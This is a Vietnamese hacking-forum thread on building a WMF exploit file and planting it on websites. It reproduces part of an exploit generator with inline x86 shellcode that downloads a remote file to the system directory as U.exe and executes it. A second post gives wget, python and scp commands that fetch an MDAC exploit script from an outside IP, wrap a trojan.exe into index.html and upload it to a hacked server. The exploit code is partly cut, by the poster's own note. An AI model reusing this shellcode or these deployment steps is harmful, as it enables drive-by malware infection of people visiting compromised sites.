Cách tạo File WMF và gắn vào web ! 0-Day exploit

Cách tạo File WMF và gắn vào web ! 0-Day exploit



Code:

/*

\

/ WMF nDay download() Exploit Generator

\ by Unl0ck Research Team

/

\

/ greetz:

rst/ghc { ed, uf0, fost },

uKt { choix, nekd0, payhash, antq },

blacksecurity { #black } ,

0x557 { kaka, swan, sam, nolife },

sowhat, tty64 { izik };



This sploit is now full shit, so...

kiddies party has been started!!!



urs,

darkeagle

\

/

*/



#include <stdio.h>

#include <winsock2.h>



#pragma comment(lib, "ws2_32")



// Use for find the ASM code

#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90\

__asm _emit 0x90 __asm _emit 0x90\

__asm _emit 0x90 __asm _emit 0x90\

__asm _emit 0x90 __asm _emit 0x90

#define PROC_END PROC_BEGIN

#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90"

#define SEARCH_LEN 8

#define MAX_SC_LEN 2048

#define HASH_KEY 13



// Define Decode Parameter

#define DECODE_LEN 21

#define SC_LEN_OFFSET 7

#define ENC_KEY_OFFSET 11

#define ENC_KEY 0xff





// Define Function Addr

#define ADDR_LoadLibraryA [esi]

#define ADDR_GetSystemDirectoryA [esi+4]

#define ADDR_WinExec [esi+8]

#define ADDR_ExitProcess [esi+12]

#define ADDR_URLDownloadToFileA [esi+16]



// Need functions

unsigned char functions[100][128] =

{ // [esi] stack layout

// kernel32 4 // 00 kernel32.dll

{"LoadLibraryA"}, // [esi]

{"GetSystemDirectoryA"}, // [esi+4]

{"WinExec"}, // [esi+8]

{"ExitProcess"}, // [esi+12]

// urlmon 1 // 01 urlmon.dll

{"URLDownloadToFileA"}, // [esi+16]

{""},

};





...................

//quá dài pót tượng trưng thế thôi







//

//--------------------------------------------------------------------

jmp sc_end



sc_start:

pop edi // Hash string start addr (esp -> edi)



// Get kernel32.dll base addr

mov eax, fs:0x30 // PEB

mov eax, [eax+0x0c] // PROCESS_MODULE_INFO

mov esi, [eax+0x1c] // InInitOrder.flink

lodsd // eax = InInitOrder.blink

mov ebp, [eax+8] // ebp = kernel32.dll base address



mov esi, edi // Hash string start addr -> esi



// Get function addr of kernel32

push 4

pop ecx



getkernel32:

call GetProcAddress_fun

loop getkernel32



// Get function addr of urlmon

push 0x00006e6f

push 0x6d6c7275 // urlmon

push esp

call ADDR_LoadLibraryA // LoadLibraryA("urlmon");



mov ebp, eax // ebp = urlmon.dll base address



/*

push 1

pop ecx



geturlmon:

call GetProcAddress_fun

loop geturlmon

*/

call GetProcAddress_fun



// url start addr = edi



LGetSystemDirectoryA:

sub esp, 0x20

mov ebx, esp



push 0x20

push ebx

call ADDR_GetSystemDirectoryA // GetSystemDirectoryA



LURLDownloadToFileA:

// eax = system path size

// URLDownloadToFileA url save to a.exe

mov dword ptr [ebx+eax], 0x652E555C // "\U.e"

mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe"

xor eax, eax

push eax

push eax

push ebx // %systemdir%\U.exe

push edi // url

push eax

call ADDR_URLDownloadToFileA // URLDownloadToFileA



//LWinExec:

mov ebx, esp

push 1//executes in SW_SHOW, push 0 if you wanna in SW_HIDE..

push ebx

call ADDR_WinExec // WinExec(%systemdir%\a.exe);



Finished:

//push 1

call ADDR_ExitProcess // ExitProcess();



GetProcAddress_fun:

push ecx

push esi



mov esi, [ebp+0x3C] // e_lfanew

mov esi, [esi+ebp+0x78] // ExportDirectory RVA

add esi, ebp // rva2va

push esi

mov esi, [esi+0x20] // AddressOfNames RVA

add esi, ebp // rva2va

xor ecx, ecx

dec ecx



find_start:

inc ecx

lodsd

add eax, ebp

xor ebx, ebx



hash_loop:

movsx edx, byte ptr [eax]

cmp dl, dh

jz short find_addr

ror ebx, HASH_KEY // hash key

add ebx, edx

inc eax

jmp short hash_loop



find_addr:

cmp ebx, [edi] // compare to hash

jnz short find_start

pop esi // ExportDirectory

mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA

add ebx, ebp // rva2va

mov cx, [ebx+ecx*2] // FunctionOrdinal

mov ebx, [esi+0x1C] // AddressOfFunctions RVA

add ebx, ebp // rva2va

mov eax, [ebx+ecx*4] // FunctionAddress RVA

add eax, ebp // rva2va

stosd // function address save to [edi]



pop esi

pop ecx

ret



sc_end:

call sc_start



PROC_END //C macro to end proc

}

}



boyboy(HCE)



exploit qua mdac
Code exploit

Code:

http://www.milw0rm.com/exploits/2052

Download

Code:

http://66.29.6.213/~lehung/linux.py

Có mấy cái exploit như sau
1>vào ssh của bạn , gõ như sau

Trích:

#wget http://66.29.6.213/~lehung/linux.py
#python linux.py http://hacked/trojan.exe index.html
#scp index.htm user@hacked:/www


hình minh họa

2>download cái python for win ở http://www.python.org/ftp/python/2.4.3/python-2.4.3.msi
làm same same như trên rùi up cái index lên
còn cái wmf tui chưa có time test


&killlua(HCE)